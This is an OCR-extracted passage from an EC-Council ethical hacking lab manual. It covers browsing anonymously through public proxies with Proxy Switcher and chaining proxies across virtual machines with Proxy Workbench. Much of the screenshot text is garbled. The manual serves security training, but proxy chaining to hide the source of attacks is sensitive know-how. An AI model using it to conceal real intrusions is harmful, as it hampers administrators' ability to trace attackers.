  • 125. Module 03 - Scanning Networks Proxy Switcher Unregistered ( Active Proxy: 95.110.159.54:8030 ‫־‬ ITALY) I ~ l ‫ם‬ f x p F i kF ile E d it A c t io n s V ie w H e lp $ 5 Proxy Scanner Serve! State Response Comtiy H * New !766) £ 9 T.144 4^.65:3123 (Alve-SSU 10159ms “ SVRAM ARAB REPUBLIC Ugh Anonymous (0) 001.147.48.ilS.etatic.ret.. (Alve-SSU 13115n* [ J HONG KONG • g t SSL(O) , ? host54-159-110-95.server.. (Alve-SSU 10154ns | | I T M Y - ‫־־‬e? Bte(O) & 218.152.121.194:3030 Alive 10436n s > : REPJBLIC OF KOREA B - R Dead (2381) ,f dedserr2i 23Jevonlme to n (Alve-SSU 13556n s ■■SWEDEN P»m*n#ntly(G975) L 95 110159 54 8080 (Alve-SSU 1123‫־‬n.« I ITAtr 003‫.״‬ Anonymity(4G7) (Alve-SSU 107^0rn» UNI ILL) ARAD CMIRATCS Pnvate lib) ,? 95 211 152 218:3123 (Alve-SSU 10233n s “ NETHERLANDS | 0 ‫־־‬ Dangerous (696) u54aDJl133a‫׳‬r»unfl,co.kr:l (Alve-SSU 10955n s REP JBLIC OF KOREA l‫״‬ & My Proxy Servere (0) , f 91 82 £5 173:8080 (AlveSSU 1l251r»a “ HUNGARY (0)‫־‬25ProxySviitcha—: g 86.111 144.194.3128 (Alve-SSU 10931ns “ IRAG ,? 41.89.130^3128 (Alve-SSU 158101s g g K E N rA £ 91 14444 86 3123 (Alve-SSU 10194ns “ S ^ A N ARAB REPUBLIC ‫״י‬I> Dseblcd 11 Keep Alive |[" Auto Switch 2l8.152.121.1&4:8030tested as [fAlve-SSL! 218.152.121.184:8030tested as (Alive] h ost54 -1 59-110-95 9 »rverdedicati arnb a 8 ‫ג‬C80 tested as RAIve-SSL)] 031 .1 4 7.4 8 .1 16.atotc.nctvigator.con> :3123tested0 9 [(Mrvc SSL)) MLE a u c A n o n y m it y FIGURE 1213: Succesfiil connection of selected proxy 18. Go to a web browser (Firefox), and type die following URL http: / /w^v.proxyswitcher,com/ checLphp to check die selected proxy server comietivity; if it is successfully conncted, then it show's die following figure. r 1 0 ‫־‬ C x 1Detecting your location M07illa Firefox 3 ? £ri!t ¥"■'‫'״‬ History BookmorH Iool*• Jjdp C *‘I Go®,I. f i f ! 0*r»<ring your kx‫«־‬ io ‫׳‬v 4‫־‬ -.IUU-..J.UU,I 2 0 2 .5 3 .1 1 .1 3 0 , 1 9 2 .1 6 8 .1 .1 Unknown Your possible IP address is: Location: Proxy Inform ation Proxy Server: DFTFCTFD Proxy IP: 95.110.159.67 Proxy Country: Unknown FIGURE 1214: Detected Proxy server 19. Open anodier tab in die web browser, and surf anonymosly using diis proxy. £□ Starting from version 3.0 Proxy Switcher incorporates internal proxy server. It is useful when you want to use other applications (besides Internet Explorer) that support HTTP proxy via Proxy Switcher. By default it w aits for connections on localhost:3128 Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 208
  • 126. Module 03 - Scanning Networks p ro x y server Cerca con Google - Mozilla Firefox rlc Edit yie * History Bookmark: Tools fcWp | p r a y i c ‫.־‬ « - C e ra con GoogleOttecbngyour location.. P *C ‫־‬ Gccgfc^ <9 wvw* g c o g k .it ?hb(t&g5_nf=1&pq-prcr)■ w r ‫^־‬rc?cr>- 0&g?_<l-22t51.1t>f-taq-pro>fy‫»־‬scfvcr& pt-p8b1»- *Tu R ic er ca Im m agin i M aps P la y Y ouT ube M ew s G m ail D ocu m en t! C a le n d a r U ttio proxy server Proxy Wikipodia it w kjpedia.otgAvikn'Proxy In informatica e telecom unica^ ow un p ro x y 6 un programma che si mlei pone tra un client ed un s e rv e r farendo da tram re o neerfaccia tra 1due host ow ero ... Altri usi del termrne Proxy P io x y H T TP Note V o a correlate Public Proxy Servers - Free Proxy Server List ivwiv p u b licproxyservers con V TiaCu a questa pagina Public P roxy Server* is a free and *!dependent proxy checking sy slem . O ur service helps you to protect your K ten tly and bypass surfing restrictions sin ce 2002. Proxy Servers - S o r e d B y Rating - Pro x y Servers Sorted B y Country - Useful Lin ks Proxy Server - Pest Secure, rree. Online Proxy w v w p ro x y se rv e r com ‫'׳‬ • Traduci questa pagma Thn boet fi!!*‫י‬ P io x y S erve r out thar®' S lo p searching a proxy list (or proxies that are never taut or do noi even get anl*1e P ro x y S e rv e r com has you covered from ... Proxoit - Cuida alia naviaazione anonima I proxy server Google Ricerca Immagini Maps V ideo M oaze Shopping Ptu contanuti ItaHa Cemtm locnKtA 0 3 After the anonymous proxy servers have become available for switching you can activate any one to become invisible for die sites you visit. FIGURE 1214: Surfusing Proxy server Lab Analysis Document all die IP addresses of live (SSL) proxy servers and the connectivity you discovered during die lab. T ool/U tility Inform ation Collected/O bjectives Achieved Proxy Switcher Server: List of available Proxy servers Selected Proxy Server IP Address: 95.110.159.54 Selected Proxy Country N am e: ITALY Resulted Proxy server IP Address: 95.110.159.67 P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Examine which technologies are used for Proxy Switcher. 2. Evaluate why Proxy Switcher is not open source. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 209
  • 127. Module 03 - Scanning Networks Internet Connection Required es0 Y Platform Supported 0 Classroom □ No □ iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 210
  • 128. Module 03 - Scanning Networks Lab w i 1 3 Daisy Chaining using Proxy Workbench Proxy Workbench is a uniquepivxy server, idealfor developers, security experts, and twiners, which displays data in realtime. Lab Scenario You have learned in the previous lab how to hide your actual IP using a Proxy Switcher and browse anonymously. Similarly an attacker with malicious intent can pose as someone else using a proxy server and gather information like account or bank details of an individual by performing social engineering. Once attacker gains relevant information he or she can hack into that individual’s bank account for online shopping. Attackers sometimes use multiple proxy servers for scanning and attacking, making it very difficult for administrators to trace die real source of attacks. As an administrator you should be able to prevent such attacks by deploying an intrusion detection system with which you can collect network information for analysis to determine if an attack or intrusion has occurred. You can also use Proxy Workbench to understand how networks are scanned. Lab Objectives This lab will show you how networks can be scanned and how to use Proxy Workbench. It will teach you how to: ■ Use the Proxy Workbench tool ■ Daisy chain the Windows Host Machine and Virtual Machines Lab Environment To carry out the lab, you need: ■ Proxy Workbench is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksProxy ToolsProxy Workbench I C O N K E Y ‫־‬2 3 Valuable information Test your knowledge ‫ס‬ Web exercise m Workbook review Ethical H acking and Counterm easures Copyright © by EC-Council AB Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 211
  • 129. Module 03 - Scanning Networks You can also download die latest version o f Proxy Workbench from this link http://proxyworkbench.com If you decide to download the latest version, then screenshots shown in the lab might differ A computer running Windows Server 2012 as attacker (host machine) Another computer running Window Server 2008, and Windows 7 as victim (virtual machine) A web browser widi Internet access Follow Wizard-driven installation steps to install Proxy Workbench Administrative privileges to run tools Lab Duration Time: 20 Minutes Overview of Proxy Workbench Proxy Workbench is a proxy server diat displays its data in real time. The data flowing between web browser and web server even analyzes FTP in passive and active modes. Lab Tasks Install Proxy Workbench on all platforms of die Windows operating system ‫׳‬Windows Server 2012. Windows Server 2008. and Windows 7) Proxy Workbench is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksProxy ToolsProxy Workbench You can also download the latest version o f Proxy Workbench from this link http ://proxyworkbench.com Follow the wizard-driven installation steps and install it in all platforms of Windows operating system This lab will work in the CEFI lab environment - on W indows Server 2012, W indows Server 2008‫י‬ and W indows 7 Open Firefox browser in your W indows Server 2012, and go to Tools and click options C E H Lab M anual Page 212 Ethical H acking and Counterm easures Copyright O by EC•Council AU Rights Reserved. Reproduction is Strictly Prohibited. C Security: Proxy servers provide a level of security within a - network. They can help prevent ‫ר‬ security attacks a s the only way into the network 4. from the Internet is via the proxy _ server 6. ZZ7 Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks
  • 130. Module 03 - Scanning Networks Google Moiillo Firefox fi *e •!1• -■cc9u Docum ents Calendar M ote • Sign n colt | HtJp Downloads CW-I moderns a<*SM»A St*UpS^K. Web Developer PageInfo 9‫הי‬‫״זי‬6*«)‫ז‬1‫ו‬1£‫«ז‬5 Cle«r Recent Ustsr. 01+“Sh1ft*W ♦You Search Im ages Google Google Search I'm feeling Lucky • Google About Google Google comAtfM«t1«M1g P iogam m ei Business Soltiion* P iracy t Te FIGURE 13.1: Firefox options tab 7. Go to Advanced profile in die Options wizard of Firefox, and select die Network tab, and dien click Settings. Options &‫ם‬ ‫§י‬ % p 3G e n e ra l T a b s C o n te n t A p p lic a tio n s P iiv a c y S e c u rity S>nc A d v a n c e d | S g t n g i . C le a r N o w C le a r N o v/ Exceptions.. G e n e ra l | M etw orV j U p d a te | E n c ry p tio n j C o n n e c tio n C o n fig u r e h o w h r e f o i c o n n e c ts t o th e Intern et C a c h e d W e b C o n te n t Y o u r v re b c o n te n t c a c h e >sc u rre n tly u sin g 8 .7 M B o f d is k sp a c e I I O v e rrid e a u to m a t e c a c h e r r a n a g e m e n t Limitcache to | 1024-9] MB of space O fflin e W e b C o n te n t a n d U se r D ata Y o u 1 a p p lic a tio n c a c h e is c j iie n t l/ u s in g 0 b y te s o f d is k s p a c e M T e ll m e w h e n a *refccit* aclrt t o s to re H at* fo r o fflin e u ce T h e fo llo v /in g tv e b site s a te a lo w e d t o s to re data fo r o fflin e u s e Bareve.. H e lpC a n c e lO K FIGURE 13.2 Firefox Network Settings f t The sockets panel shows the number o f Alive socket connections that Proxy Workbench is managing. During periods of no activity this will drop back to zeroSelect Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 213
  • 131. Module 03 - Scanning Networks 8. Check Manual proxy configuration 111 the Connection Settings wizard. 9. Type HTTP Proxy as 127.0.0.1 and enter die port value as 8080‫י‬ and check die option of U se this proxy server for all protocols, and click OK. Connection Settings Configure Proxies to Access the Internet 8080— 8080y | 8080v Port Port Port PorJ: O No prox^ O Auto-detect proxy settings for this network O iis* system proxy settings (§) Manual proxy configuration: HTTP Proxy: 127.0.0.1 @ Use this proxy server for all protocols SSL Proxy: 127.0.0.1 £TP Proxy: 127.0.0.1 SO£KS Host 127.0.0.1 D SOCKSv4 (S) SOCKS^5 No Proxy for localhost, 127.0.0.1 Example .mozilla.org, .net.nz, 192.168.1.0/24 O Automatic proxy configuration URL Rgload HelpCancelOK FIGURE 13.3: Firefox Connection Settings 10. While configuring, if you encounter any port error please ignore it 11. Launch the Start menu by hovering die mouse cursor in the lower-left corner of the desktop. 4 WindowsServer2012 WaoomW1PiW2(dentCjiCkttr0HiKtTr baLMcncowtuidMO. g. - ?• FIGURE 13.4: Windows Server 2012 - Desktop view 12. Click die Proxy Workbench app to open die Proxy Workbench window S The status bar show s the details of Proxy Workbench*s activity. The first panel displays the amount of data Proxy Workbench currently has in memory. The actual amount of memory that Proxy Workbench is consuming is generally much more than this due to overhead in managing it. Scan computers by IP range, by domain, single computers, or computers, defined by the Global Network Inventory host file Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 214
  • 132. Module 03 - Scanning Networks Server M anager W indows PowerShell G oogle Chrom e Hyper-V M anager Fa m • ‫וי‬ Control Pand W Hyper•V Virtual M achin e ‫״‬ S O I Server £ Com m and Prom pt M O? 113 Firefox Searct101_ H O D etk c d o b a I Netw ork Inventory Si Proxy Woricbenu. FIGURE 13.5: Windows Server 2012 - Apps 13. The Proxy Workbench main window appears as shown in die following figure. H IProxy Workbench m File View Tools Help ‫ם‬ ‫ו‬ _‫ש‬‫ב‬‫ע‬ K N J H mDetails for All Activity 1 Protocol | StartedToFrom 173.194.36.24:80 (www.g.. HTTP 18:23:39.3^ 74.125.31.106:80 (p5 4ao HTTP ‫־‬18:23:59.0 173.194 36 21:443 (maig HTTP 18:24:50.6( 173.194.36.21 :443 (m aig. HTTP 18:24:59.8' 173.194.36.21:443 (maig.. HTTP ‫־‬18:25:08.9 1 7 ‫ר‬ K M TC.71 • A n (m ‫־‬d ‫״‬ H T T P ____ 1Q .T C .1Q M JJ127.0.0.1:51199 127.0.0.1:51201 J l l 127.0.0.1:51203 J d 127.0.0.1:51205 J d 127.0.0.1:51207 W 'l!?7nn 1‫ו‬ ^ ‫ו‬ ‫ל‬ ‫ו‬ Mooitorirg: WIND33MR5HL9E4 (10.0.0.7) SMTP •Outgoing e-mal (25) ^ POP3 •Incoming e-mail (110) & HTTP Proxji •Web (80B0) HTTPS Proxy •SecureWeb (443) ^ FTP •File T!ansfer Protocol (21) Pass Through ■For Testing Apps (1000) 3eal time data for All Activity J 0 0 0 0 3 2 / I . 1 . . U s e r —A g e n t 2 f 3 1 2e 3 1 Od 0 A S S 7 3 0 0 0 0 4 8 : M o z i l l a / 5 . 0 ( ¥ 3a 2 0 4d S i 7 a 6 9 6 c 6 c 0 0 0 0 6 4 i n d o w s N T 6 . 2 ; W 6 9 6 e 6 4 6 £ 7 7 7 3 2 0 4 e 0 0 0 0 8 0 O U 6 4 ; r v : 1 4 . 0 ) G 4f 5 7 3 6 3 4 3 b 2 0 7 2 7 6 0 0 0 0 9 6 e c k o / 2 0 1 0 0 1 0 1 F i 6 5 6 3 6 b 6 f 2 f 3 2 3 0 3 1 0 0 0 1 1 2 r e f o x / 1 4 . 0 . 1 . . P r ? 2 b5 6 6 6 f 7 8 2 f 3 1 3 4 0 0 0 1 2 8 o x y - C o n n e c t i o n : 6 f 7 3 7 9 2 d 4 3 6 f 60 6 e 0 0 0 1 4 4 k o o p - a l i v o . H o s t 6 b 6 5 6 5 7 0 2 d 6 1 6 c 6 9 0 0 0 1 6 0 : m a i l . g o o g l e . c o 3a 2 0 6d 6 1 69 6 c 2 e 6 7 , 0 0 0 1 7 6 m . . . . 6d O d 0o O d 0 a < III > 7angwrrx?n— Luyymy. u n ;1.un ; 1 iciu ic . un ; 11Memory: 95 KByte Sockets: 1CO Events: 754 FIGURE 13.6: Proxv Workbench main window 14. Go to Tools on die toolbar, and select Configure Ports S The events panel displays the total number of events that Proxy Workbench has in memory. By clearing the data (File‫>־‬Clear All Data) this will decrease to zero if there are no connections that are Alive & The last panel displays the current time as reported by your operating system Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 215
  • 133. Module 03 - Scanning Networks Proxy Workbench U- 3 L^oolsJ Help Save Data... =tails forAll Activity m n i h m |10m | T0 I Protocol | Started ^ Configure Ports. 173.194.36.24:80 (w»w*.g.. HTTP 18:23:39.3} 74.125.31.106:80 |pt4ao HTTP ‫־‬18:23:59.0 173.194 36.21:443 (naig. HTTP 18:24:50.6( 173.194 36.21:443 (na*g HTTP 18:24:59.8! 173.194 36 21:443 (naig HTTP ‫־‬18:25:08.9 »‫*י׳ו‬‫ו‬n*‫״‬‫ול־‬c‫*־‬1m• HTTP ■ m -wipr J 127.0.0.1 tJ 127.0.0.1 3 d 127.0.0.1 £ J 127.0.0.1 ;jd 127.0.0.1 ‫ל‬ ‫ו‬‫ו‬511‫וו‬‫ח‬7- |‫ו‬‫ל‬4 > File View I 5 Monitoring: W All Activity 51199 51201 51203 51205 51207 Failure Simulation... ^ SMTF Real Time L°99in9 • POPd Options... k # HTTP T‫־־‬TWny T T W U (W W ) ^ HTTPS Proxy •Secure Web |443) ^ FTP •File Transler Protocol (21) Pass Through ■For Testing Apps (1000) Real time data for All Activity 0a 55 73 69 6c 6 c ?3 20 4e 20 72 76 32 30 31 2 f 31 34 6 f 6e 6e 61 6c 69 6 c 2e 67 31 Od 6 f 7a 6 f 77 34 3b 6 £ 2 £ 6£ 78 2d 43 70 2d 61 69 Od 0a 2£ 31 2e 3 a 20 4d 69 be 64 4£ 57 36 65 b3 6b 72 65 66 6 f ?8 79 6b b5 65 3a 20 6d 6d Od 0a / l . 1 . .U s e r - A g e n t : M o z i l l a / 5 . 0 (W in d o w s NT 6 .2 ; U OU64; r v : 1 4 . 0 ) G e c k o /2 0 1 0 0 1 0 1 F i r e £ o x / 1 4 . 0 . 1 . P r o x y - C o n n e c t io n : k e e p - a l i v e . . H o st : m a il. g o o g le . c o m .... 0 0 0 0 3 2 0 0 0 0 4 8 0 0 0 0 6 4 0 0 0 0 8 0 0 0 0 0 9 6 000112 0 0 0 1 2 8 0 00144 0 0 0 1 6 0 0 0 0 1 7 6 I eiiim a ic UII 11c1u4c. uu u nuuic u ii L‫׳‬ «ty1c u n 1_<.yymy. u n ‫׳‬ j u iMemory: 95 KByte Sockets: 100 Events: 754 FIGURE 13.7: Proxy Workbench ConFIGURE Ports option 15. 111die Configure Proxy Workbench wizard, select 8080 HTTP Proxy - Web 111 die left pane of Ports to listen on. 16. Check HTTP 111 die right pane of protocol assigned to port 8080, and click Configure HTTP for port 8080 Configure Proxy Workbench Protocol assigned to port 8080 Proxy Ports Ports to listen on: Don't use>>; ✓■: Pass Through □HTTPS □POP3 FTP‫ח‬ Port [ Description 25 un SMTP • Outgoing e-mail PI‫־‬lP3 -lnnnmino ft-maiI 18080 HTTP Proxy ■Web 443 HTTPS Proxy ‫־‬SecureWeb 21 FTP ‫־‬File Transfer Protocol 1000 Pass Through ■Foe Testing Apps &dd- | Qetete | | Configure HTTP tor poet 8080.| CloseW Sho^ this screen at startup FIGURE 13.8: Prosy Workbench Configuring HTTP for Port 8080 17. The HTTP Properties window appears. Now check Connect via another proxy, enter your Windows Server 2003 virtual machine IP address 111 Proxy Server, and enter 8080 in Port and dien click OK & The *Show the real time data window' allows the user to specify whether the real-time data pane should be displayed or not CLl People who benefit from Proxy Workbench Home users who have taken the first step in understanding the Internet and are starting to ask "Bat how does it work?” People who are curious about how their web browser, email client or FTP client communicates with the Internet. People who are concerned about malicious programs sending sensitive information out into the Internet. The information that programs are sending can be readily identified. Internet software developers who are writing programs to existing protocols. Software development for die Internet is often verv complex especially when a program is not properly adhering to a protocol. Proxy Workbench allows developers to instantly identify protocol problems. Internet software developers who are creating new protocols and developing the client and server software simultaneously. Proxy Workbench will help identify non-compliant protocol :- T-1-■> Internet Security experts will benefit from seeing the data flowing in real-time This wiH help them see who is doing what and when Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 216
  • 134. Module 03 - Scanning Networks ^ Many people understand sockets much better then they think. When you surf the web and go to a web site called www.altavista.com, you are actually directing your web browser to open a socket connection to the server called "www.altaviata.com" with port number 80 FIGURE 13.9: Prosy Workbench HTTP for Port 8080 18. Click Close in die Configure Proxy Workbench wizard after completing die configuration settings The real time logging allows you to record everything Proxy Workbench does to a text file. This allows the information to be readily imported in a spreadsheet or database so that the most advanced analysis can be performed on the data 19. Repeat die configuration steps of Proxy Workbench from Step 11 to Step 15 in Windows Server 2008 Virtual Machines. Configure Proxy Workbench Protocol assigned to port 8080 □ <Don't use>___________ □ Pass Through □ HTTPS □ POP3 Configure HTTP for pent 8080 Proxy Ports 3orts to listen on: Port | Description SMTP • Outgoing e-mail POP3 ‫־‬Incoming e-mail HTTPS Proxy-Secure Web FTP ‫־‬ File Transfer Protocol deleteAdd Close 25 110 8080 HTTP Proxy -Web 443 21 1000 Pass Through - For TestingApps □FTP W Show this screen at startup FIGURE 13.10: Proxv Workbench Configured proxy HTTP Properties General C On the web server, connect to port: (• Connect via another proxy Proxy server |10.0.0.7| Port: Iftfififi CancelOK Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 217
  • 135. Module 03 - Scanning Networks 20. 111Windows Server 2008 type die IP address of Windows 7 Virtual Machine. 21. Open a Firefox browser in Windows Server 2008 and browse web pages. 22. Proxy Workbench Generates die traffic will be generated as shown in die following figure of Windows Server 2008 23. Check die To Column; it is forwarding die traffic to 10.0.0.3 (Windows Server 2008 virtual Machine). McnfanjMN1r2CtU.20010|43‫־‬;‫|׳‬ A‫«־־‬•‫=-׳‬‫־‬ UK -*<o»e£ 577‫ז‬ <V13r>M4ca1facc tWJ 1556 r»9rM 0(a<rM . ‫מו‬ ‫נ‬ 1191 2110 I’JK *v«**<*3ntrr»»t 3(85 IVJ ;v» » . < * < * 1 1 9 9 . * ‫״‬ *AttkaacaiNMt I3S h■■aita ‫׳‬‫״‬•a 1Wi PAthtf<ka»Mcc FV»9hn<*co<ra<t 06.K2S.31T ‫סט‬?05206 06052C92? 06®274B 06052*16? utre^riTO KKrT K05267W arezrui 6»‫י‬‫י‬.05» KT ,s z a 0IB?W 060527*3 HB700 ;‫י‬»‫י‬‫י‬05» ««27» De«r?«e 06052»»l ‫ת‬2 1120►«•*»«‫*׳״‬■*9‫»ה‬ 06052*173 sauszs t£3524:45 3‫י‬3•05206 ‫זמ.גג‬105» ce0525&43 « 052*100 «0521102 ®0526217 KOI.2t.3K ccosjt*1 (SOS?MBtiiir, :1 4r, « 052(.734 n n ;1 19, »11!»r (C05:?(CT tSOlJMM »0J2n01ct012733 M0*27 411 160527496 £605275.* *05 2759? (6052702 3‫ט‬27££05 C605275S7 wanton1aaa1 aca! laooitCMmaiaxo 1000 )•CB) Mtaiaon taaa‫ו‬•cm 10011 > rw ra a a ira M00 )•CIO laaaiKm 100a )■m taaaiacta M00 )•CM MaaiKHi 144a]•QM 1000)«:w laaaiaao Mtaianlaaaiaxa uaaiaceo lOOOKW 7‫ל‬0 vr.u -‫י‬ 11 ‫׳‬ ‫*.־־‬*» fJ'•U ‫י‬1> .‫«־‬u:‫«־‬11.41• •I .‫נ‬1> ‫י‬1> :‫נ־‬11 ‫י‬■•11 .‫נ‬U •1.* 1—2 | MAOAOy ^ ship 0.*!>> ‫ן‬ ‫מ‬1‫ו»*<»׳‬ ^1CQC•) I.(flff J'.f'AIBI'/tllilUII y HT‫ז‬ ‫מ‬ F W -Sioim W.b (4431 6 FTp.Fteriattfa *<xo:d|71) Vp*m111*h11-f«r»»njA«c*no30) Sf <4 20«(30II 31 ro 0‫נ‬ 4c 11 7i ?2 W 2c 32 3d 3» (3 U K 3d 41 k- <3 74 (1 «} MH 31303220 •041;4u >>203864 0?»31030 1113Od Qo 716120«d bI «m Cm?< *7$‫י‬61tC 2010 30 78 70 63 4d £1 72 39 30 47 65‫י‬666 7420 32 47 Id 14 t l Ic 3a Od 0 . 43 450‫ל‬M •0(448 1 (0 17 34 <3TT 31 •00D&4 E x te rn Sot 26 45 •a[csc •0C112:■«)‫די‬0• 141]‫׳‬3C 00160• on<?• 2?>5d 5200S .. : : t l a ir 1 u > - ) u‫י‬4 023.tf 1«J F ri 4•100.'‫י‬1*2«c 3n :•dta-Caat> 0«3:>c : .J i-a g e FIGURE 13.11: Proxy Workbench Generated Traffic in Windows Server 2012 Host Machine 24. Now log in in to Windows Server 2008 Virtual Machine, and check die To column; it is forwarding die traffic to 10.0.0.7 (Windows 7 Virtual Machine). Fife View Tod* Hrip Mirilcrrfj y1cbncni<2(’.3|10Q0 3| r**»h':1HTIPPn»y‫'־‬Veb(0C8]) d T r d 1 1 S te M | 1■.,* 1•.f ‫״‬I K £J*)O O G «fflO 1000701 CO HTTP 05 flfl 0^7 3‫ג‬ or, 05 4n !00 F 4J10.QO.6SWO 1ao.a?;»80 H U P 06.05 40109 061*41156 K jU ': a : f c 3 1 i4 lQ 0 D ;-m m H U P (E tft * 6 9 ‫נ‬‫נ‬ 1)• (h 41 070 F £ J '] . 0 0.69615 1aoa7.83E0 HTTP 06.(E *3 375 CB OG■41 625 F £ J 6 ; 0 : ‫־‬ s n t : ‫נט‬ ‫ש‬0700‫ו‬ H U P (£0 6 41437 (COS 41 015 F £ J 1 0 0 06 9819 100 07:83EO HTTP 0506 *3 531 (C 05 41 281 F £ J 1 a a 0.6 9620 100.07:8360 HTTP 06.05 4Q 546 06.05 41.281 F jh J 'I Q0.&9B22 1aoa7!mE0 HTTP 0E<E 4a 578 05 05 40 B43 F £ | - : . 0 : . 6 5824 1a0.a7:83EO HTTP 060=4:655 06 05:41.828 F £110.00 69626 :‫ש‬ ‫ש‬0 0 0 7‫ו‬ HTTP 06 05*3 906 (KOS415Q3 F £ 1 10 00 69 82 8 1000.7:8303 HTTP 06<e 41015 06 05 41 406 F £ 1 *1 0 0 .6 9830 1ClO.a7.83EO HTTP 06.0C 41 *09 06 05 41 718 F £1 1 0 0 0 &9H32 m on7rm go H U P (K ffi 41 TIB O, (h 41 ‫׳׳‬HI Fj *1 1 2J 9 ^ ,iMTP•IJ1*yt«nyvm«1l(2&| POP3 •IruMfiinjoniilplCI Qwpnmamm■H 1QOQ2I0 1QQQ7 &10.00.6!0100.0? HITP5 Ro«v -Seojic Web(4431 " W FTP ■Fie 1lend® FVolard |211• Nol L ila PdssThioj^i F01 Tastro^oo*nOOOl f« a ?‫פ‬ ffe d cMs tei Hr TP Ptcay •V/H3 |B0B]| 7420S3 i l 312030303a 4?.rf‫ל‬73614 r 3220?2b'3 2c 3031.‫י‬33032 63 b0 65 2d ■(3 2d 61 6? 65 3d 63 74 69 b l 6 • 65 Od 0o Od 0o 76 70 69 72 65 73 3c 4d 61 72 20 32 30 31 39 20 47 <d 64 Od 0« 66 69 6564 20 1e 74 20 32 30 30 39 20 47 4d Od G« <3 61 6t 6 c 30 20 6d 61 78 Od 0 9 43 61 t e in 15 65 70 2d 61 6c 69 6‫ל‬ S xp iro D S ot 26 Hnx 20110aG2<0 CUT T.m t Hrd f t 1. 23 0 c t 2009 2 0 •10 04 GMT. . C»ch0-C011t ro L m ax-oge-360 0 . Connect io a k o e p - o liv c 064: ‫״‬ 010080 *0 9‫־‬ ‫־‬ ‫־‬ 060112 0 0012C 060144 060160 060176 080192 T»!mnale 01( RcIlbc Qr 'hrb»f‫־‬ C m ^ !‫׳‬ CK -oggrg 01( 613AM 6:15AT1‫׳‬ Mara y 3ES KBylei J Start | Proxy Worfctxfyh AiLd FIGURE 13.12 Proxy Workbench Generated Traffic in Windows Serve! 2003 Virtual Machine & Proxy Workbench changes this. Not only is it an aw esom e proxy server, but you can se e all of the data flowing through it, visually display a socket connection history and save it to HTML £ 7 And now, Proxy Workbench includes connection failure simulation strategies. What this means is that you can simulate a poor network, a slow Internet or unresponsive server. This is makes it the definitive TCP application tester Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 218
  • 136. Module 03 - Scanning Networks 25. Select On die web server, connect to port 80 in Windows 7 virtual machine, and click OK -TTTP P ro p erties G eneral | (• O n the * tcb server, co n n e ct to port: C " C on n ect v b 0T0*her proxy Pro<y :errer 110.0.0.5 Port: [fiflffi OK i l C«r>cd HI It allows you to 'see' how your email client communicates with the email server, how web pages are delivered to your browser and why your FTP client is not connecting to its server FIGURE 13.13: Configuring HTTP properties in Windows 7 26. Now Check die traffic in 10.0.0.7 (Windows 7 Virtual Machine) “TO” column shows traffic generated fiom die different websites browsed in Windows Server 2008 " Unix ‫צ&ו‬7‫הו‬ p i? w a » '*wts c « > » w W d iso « > • <§>o 11 1► ;>■ r*e VWwr Toeli Help &!‫•ג&ל‬‫־‬£< D cU I1taH TTPIW -W «b 180801 m i l ► From ‫:י‬­ Pidocoi I |U * E -* rl 1 LMlSUto B/*5 C25 1 BylesS *010.0 D32237 <.26E0 I1:..h‫ד‬3.*.‫גן‬ H U P 06:0634.627 06.C635.436 FV»Bho? dfOcmecC.. 1577 0 )0 1 0 0 0 32239 •571SS22G.aK:£0|adi HTTP 0&£634643 CE<62SG3 fVt'B hai d ;c f r r « l 1555 0 )8 1 0 0 0 3 2 2 3 9 &‫»*<י‬0»78206126‫י‬ * HTTP C6(634666 06(636390 P*J»3 l « J i « r r « l ... 1556 0 ;0 1 0 0 0 3 2 2 4 0 i3 8 7 8 2 0 S 1 2 6 £ 0 (a h t HTTP (6:0634.836 06(635624 f*■‫״‬? t e d t a r r e d . 1950 0 )0 1 0 0 0 32241 133 73 336126.tC |ic‫*־‬U HTTP 060634.336 060636624 FV»Bh n J ‫־‬.ccrreO... 1131 0 ) 0 10 0 0 3 2242 2027921012140(t*K1 HTTP C&C634963 c ec & x 2 1 e Km d : « r r « l 2110 0 5 0100032243 57‫י‬ iffi 2262(68(U*te HTTP (6(6S6(E3C (6(636186 4176 0 ) 0 10 0 0 32244 56 ZJ5 14311l&C0lme*c h i TP CC.Ct.X.X^ C60&X3W FWB hat d n c r m l . 2710 0 )0 1 0 0 0 3 2245 201l0&9517&a>fd»1e1 HTTP 0 f e » 354 » CM & XTtS hat d if f rr w l 1572 112 )B 10 0 0 3 224S 1-: ►1. ‫־‬‫׳‬,‫־‬ I..: HI TP 06:0636483 (6 (C!36 (66 ‫י‬‫וי‬ 0 )010 00 22‫נ‬c '» r a 2 0 5 1 2 e w 0 a * u HI IP 06C03BW3 c u r * 1 2 4 f .« ‫׳‬J n c r r « l 11« 0 )610 0 0 3 2 2 9 1 » 7 8 a * 1 2 M 0 |l« h t.. H U P CC.CVXUC 0C.CtX.4V• rv>V bm d iw riK l... IA» 0 ) 0 10 0 0 3 224) 1 9 1vV..'X.;fflT11^1. HTTP flf.r»3570? f f . f f T V ►V.T1 dtecrreel 3‫ט‬2 0 ',W10 0 0 3 2250 1«7820612S8000< ht H U P t e a . 56 786 . • > P*8 tuadK crrec1... 1183 0 ) 0 10 0 0 32251 ,. ‫״‬ : . • . . ! . u u ‫־‬ 